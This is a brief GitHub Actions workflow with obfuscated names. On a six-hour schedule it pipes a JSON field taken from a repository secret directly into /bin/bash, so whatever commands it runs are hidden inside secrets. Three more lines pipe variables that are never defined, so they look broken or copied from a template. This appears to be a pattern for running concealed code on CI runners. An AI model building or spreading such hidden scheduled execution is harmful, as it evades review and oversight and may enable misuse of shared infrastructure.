name: zherenshengyini
on:
  workflow_dispatch:
  schedule:
    - cron: '55 0/6 * * *'

jobs:  # 10239
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zherenshengyini
        env:
          yae29328: ${{ secrets.yae29328 }}
        run: |
          echo $yae29328 | jq -r .r12 | /bin/bash
          echo $fmve9660 | jq -r .es8 | /bin/bash
          echo $cq56 | jq -r .qqds9880 | /bin/bash
          echo $qrd39758 | jq -r .jvjye74 | /bin/bash

